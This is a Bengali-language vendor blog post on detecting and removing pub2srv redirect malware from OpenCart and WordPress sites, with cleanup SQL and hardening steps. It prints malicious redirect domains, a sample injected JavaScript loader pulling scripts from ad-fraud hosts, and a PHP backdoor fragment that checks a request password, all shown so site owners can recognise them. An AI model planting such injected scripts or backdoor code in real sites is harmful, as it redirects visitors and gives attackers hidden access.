How to remove pub2srv malware from OpenCart or WordPress website

Remove Pub2Srv Malware From Opencart
জানু. 22, 2023

আমরা বেশ কয়েক মাস ধরে OpenCart এবং WordPress ওয়েবসাইটগুলিকে লক্ষ্য করে pub2srv malware সংক্রমণ দেখে আসছি ৷ এটিকে সাধারণত pub2srv malware সংক্রমণ হিসাবে উল্লেখ করা হয় কারন তা আপনার website-এর audience-দের অন্যান্য ক্ষতিকারক Domain-এ পুনঃনির্দেশিত করে। যেমনঃ

go.pub2srv[.]com

go.mobisla[.]com

go.oclaserver[.com]

deloton.com/afu.php?zoneid= site

Dolohen.com

এছাড়াও, Google আপনার Website-এ ক্ষতিকারক Link-গুলির অধীনে আপনার Advertisement স্থগিত করবে৷ তাদের মধ্যে কিছু উদাহরণ

https://defpush.com/ntfc.php?p=1565632

https://deloplen.com/apu.php?zoneid=1558096

https://go.mobisla.com/notice.php?p=1558098&interactive=1&pushup=1

https://mobpushup.com/notice.php?p=1558098&interactive=1&pushup=1

https://wowreality.info/page.js?wm=gr

Pub2Srv ম্যালওয়্যার

Screenshot of a WordPress user’s help request in the forum.

গড়ে প্রতিদিন 30,000 Website Hack হয়। আপনি পরবর্তী?
খুব দেরি হওয়ার আগে Website Security ব্যবহার করে Malware এবং Hacker-দের থেকে আপনার Website-কে সুরক্ষিত করুন ৷

pub2srv malware কি? এর উপসর্গ কি?

এটি একটি malware যা Open Cart এবং WordPress site-গুলিকে Spammy web page-এ পুনঃনির্দেশিত করে ৷ যেখানে pub2srv malware web-পৃষ্ঠায় ক্ষতিকারক JavaScript code Inject করে। যার ফলে পুনঃনির্দেশ/pop-up হয়। Opencart-এর ক্ষেত্রে এটি SQL injection store-এ সৃষ্ট হয়। এর ফলে Hacker-কে database-এ ক্ষতিকর code যোগ করার অনুমতি দেয়। wordPress-এর ক্ষেত্রে, Hacker-রা payload insertion করার জন্য index.php বা functions.php file-টি পরিবর্তন করতে সক্ষম হয়।

এই Hack-এর সাধারণ লক্ষণ

  1. আপনার Website-এর audience-দের Advertisement, porn, Phishing page সহ Spam website-গুলিতে পুনঃনির্দেশিত করা হয়। কেন আপনার website একাধিক পুনঃনির্দেশের সম্মুখীন হয় তা জানতে আমাদের বিস্তারিত Blog check করুন।
  2. Mobile device-এ pop-up-গুলি আপনাকে App-গুলি install করতে অনুরোধ করে৷
  3. AJAX-এর উপর নির্ভরশীল plugin-গুলি কাজ করা বন্ধ করে দেয় (উদাহরণ: Tablepress, Datatable ইত্যাদি)।
  4. Google দ্বারা blacklisted বা advertisement স্থগিত করে। আমাদের Blog check করুন, আপনার স্থগিত advertisement ফিরে পান
  5. উৎসে অস্বীকৃত JavaScript code থাকে।

Hacl-এর পরিণতি

এই Malware-এর অন্তর্নিহিত কারণ হল একটি SQL injection (SQLi) দুর্বলতা। একজন আক্রমণকারী যা করতে পারেঃ

  • Database-এ content যোগ করুন, মুছুন, editing করুন বা পড়ুন।
  • Database server-এ file থেকে source code পড়ুন।
  • Database server-এ file লিখুন।
  • আপনার WordPress/OpenCart website-এর ব্যবহারকারীর record এবং password চুরি করুন।
  • যেখানে OpenCart/E-Commerce store- এ লেনদেনের তথ্য চুরি করুন।
  • আপনার Domain-এ SEO Spam এর ফলে Google Webmasters Blacklist-এ পরিণত হয়

কিভাবে আমার Website থেকে pub2srv malware code সরাতে পারি?

OpenCart malware সাধারণত database-কে সংক্রমিত করে এবং এর code নিম্নলিখিত database টেবিলে রাখেঃ

  1. oc_product_description টেবিল (পণ্যের বিবরণ)
  2. oc_category_description টেবিল (শ্রেণির বিবরণ)

আপনার OpenCart database থেকে ক্ষতিকর code সরাতে এই পদক্ষেপগুলি অনুসরণ করুন

  1. phpMyAdmin বা Sequel Pro এর মত একটি Tool ব্যবহার করে database টেবিলের পূর্বরূপ দেখুন।
  2. ‘oc_category_description’ টেবিলটি খুলুন এবং ‘বিবরণ’ কলামে এর মান পরীক্ষা করুন।
  3. আপনি নীচে দেখানো কিছু JavaScript code হিসাবে Snippet দেখতে পাবেনঃ <script type="text/javascript">//<![CDATA[ (function() { var configuration = { "token": "XXXXXXXXXXXXX", "exitScript": { "enabled": true }, "popUnder": { "enabled": true } }; var script = document.createElement(''script''); script.async = true; script.src=""//cdn.shorte[.st]/link-converter.min.js''; script.onload = script.onreadystatechange = function () {var rs = this.readyState; if (rs && rs != ''complete'' && rs != ''loaded'') return; shortestMonetization(configuration);}; var entry = document.getElementsByTagName(''script'')[0]; entry.parentNode.insertBefore(script, entry); })(); //]]></script><script data-cfasync=""false'' type=""text/javascript'' src=""//pXXXXX.clksit[e.com/]adServe/banners?tid=XXXXX_127XXX_7&tagid=2''></script><script type="text/javascript" src="https://[go.pub2srv][.com/ap]u.php?zoneid=XXXXXX"></script><script async="async" type="text/javascript" src="https://g[o.mobisl]a.co[m/notice.ph]p?p=XXXXXX&interactive=1&pushup=1"></script>
  4. প্রতিস্থাপন করার পরে নিম্নলিখিত SQL code Snippet-টি চালানঃ UPDATE oc89gWs_category_description SET description = REPLACE (description, 'INSERT MALICIOUS CODE FROM PREVIOUS STEP', '');
  5. oc_product_description টেবিলের জন্য উপরের সমস্ত ধাপের পুনরাবৃত্তি করুন।

ভিতরে WordPress malware-টি সাধারণত WordPress file-গুলিতে পাওয়া যায়ঃ

  1. index.php
  2. functions.php
  3. database টেবিল

এই পদক্ষেপগুলি অনুসরণ করুন, আপনার WordPress Server থেকে ক্ষতিকর code সরান:

  1. আপনার Open server-এ index.php file (public_html folder) এবং wp-content/themes/NAME-OF-THEME/functions.php
  2. এই file-গুলিতে Unfamiliar/Experienced/Encrypt করা code খুঁজুন। আপনি অনুরূপ code খুঁজে পেতে পারেন: <?php if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'XXXXXXXXXXXXXXXXXXXXXX')) { if ( ! function_exists( 'wp_temp_setup' ) ) { $path=$_SERVER['HTTP_HOST'].$_SERVER[REQUEST_URI]; ?>
  3. আপনি যদি এই file-গুলির যেকোন একটিতে ক্ষতিকারক code খুঁজে পান, তাহলে আপনার পরিচিত ভাল Backup থেকে file-গুলি প্রতিস্থাপন করা উচিত।
  4. এছাড়াও, উপরে OpenCart-এর ধাপে উল্লিখিত আপনার database-এর টেবিলগুলি যাচাই করুন।
  5. এছাড়াও wp-vcd.php এবং class.wp.php ফাইল এর মধ্যে wp-অন্তর্ভুক্ত directory মুছে ফেলুন। তারপর post.php এর মধ্যে wp-অন্তর্ভুক্ত directory খুলুন। পরিশেষে malware দ্বারা যুক্ত করা প্রথম php tag-টি মুছুন। Theme-এর functions.php file-টি খুলুন এবং উপরের code-গুলি মুছুন।
Remove Pub2Srv Malware
Remove pub2srv malware

গড়ে প্রতিদিন 30,000 website hack হয়।
আপনি পরবর্তী? খুব দেরি হওয়ার আগে website security ব্যবহার করে malware এবং hacker-দের থেকে আপনার website-কে সুরক্ষিত করুন ৷

পুনঃসংক্রমণ প্রতিরোধের পদক্ষেপ এবং কারণ চিহ্নিত করুন-

  1. CMS Core-এ যে কোনো পরিচিত নিরাপত্তা সমস্যা সমাধান করতে আপনার OpenCart/WordPres website সর্বশেষ version-এ update করুন
  2. Block SQL injection attacks: Astra এর মতো একটি নিরাপত্তা plugin ব্যবহার করুন। যা আপনার website এ পৌঁছানোর আগেই SQL Injection (SQLi) আক্রমণগুলিকে সক্রিয়ভাবে সনাক্ত করে এবং block করে।
  3. Admin account-এর ব্যবহারকারীর Name এবং Password পরিবর্তন করুন: যাতে Hacker Malware Cleanup-এর পরে আর website-এ access করতে না পারে।
  4. Database password পরিবর্তন করুন: যেমন Hacker database-এর সাথে সরাসরি সংযোগ করতে অক্ষম।
  5. Encryption key পরিবর্তন করুন: Spoofing এবং অন্যান্য Cryptographic আক্রমণ প্রতিরোধ করতে।
  6. শুধুমাত্র Whitelisted IP ঠিকানাগুলিতে Admin area access সীমাবদ্ধ করুন: যেমন শুধুমাত্র অনুমোদিত Administrators Backend Admin area access করতে পারেন।
  7. Unused plugin/Extension Uninstall করুন: যদি রক্ষণাবেক্ষণ না করা হয় তাহলে সেগুলিতে অবশ্যই নিরাপত্তা সংক্রান্ত সমস্যা থাকতে পারে। যার ফলে প্রথমে তা Hack হয় ৷
  8. Server log Scan করুন: অনেক সময় আপনি Log-গুলিতে অপরিচিত বা বিভ্রান্তিকর ত্রুটি খুঁজে পেতে পারেন। যা Hack-এর source এবং সময় নির্দেশ করতে পারে।

সম্পর্কিত নির্দেশিকা – wordpress hack অপসারণ

Astra Web Security সম্পর্কে-

Astra Web Security আপনার CMS-এর জন্য একটি End-to-end নিরাপত্তা সমাধান পদ্ধতি। যার দ্বারা শুধুমাত্র একটি button-এ click করে malware থেকে নিজেকে রক্ষা করতে পারবেন। যেখানে আমাদের Security Specialist-রা আপনার online business সুরক্ষিত করতে 24×7 সহায়তা প্রদান করে। আপনি যদি পেশাদার সাহায্য চান বা জানতে চান যে আমরা কীভাবে আপনার website 100% পরিষ্কার এবং নিরাপদ নিশ্চিত করি তাহলে নীচের Chat widget-এ message দিন!

Free Website Toolkit

Money Back Guarantee

If you’re unhappy for any reason, let us know why. Our friendly support guy is standing by. If you do decide we’re not the right host for you though, we’ll give you a hassle-free refund. We may have to stock up on tissues if you cancel though because we hate break-ups, but we promise, no hard feelings. Just cancel your account within your first 30-days for a full refund, or receive a prorated refund of unused service after 30-days. It’s that easy.

Free Domain Registration

In order to qualify for (1) one free domain name registration, you must sign up for a 12, 24 or 36 month Bitbyhost Shared, Web hosting and WordPress plan. Offer only applies to domains available only .com at the time of hosting signup, and on their initial purchase term. This offer is NOT available under any other hosting plans, nor can it be combined with any other offers. After the first year, your domain will renew at the regular rate.
If your hosting plan includes a free domain and you cancel your hosting within the first year, a non-refundable $12.08 USD domain fee (+ any applicable taxes) for the domain name will apply. Please note that newly registered domains cannot be transferred to another registrar during the first 60 days of the registration period.

Discount will be automatically applied to your cart at checkout.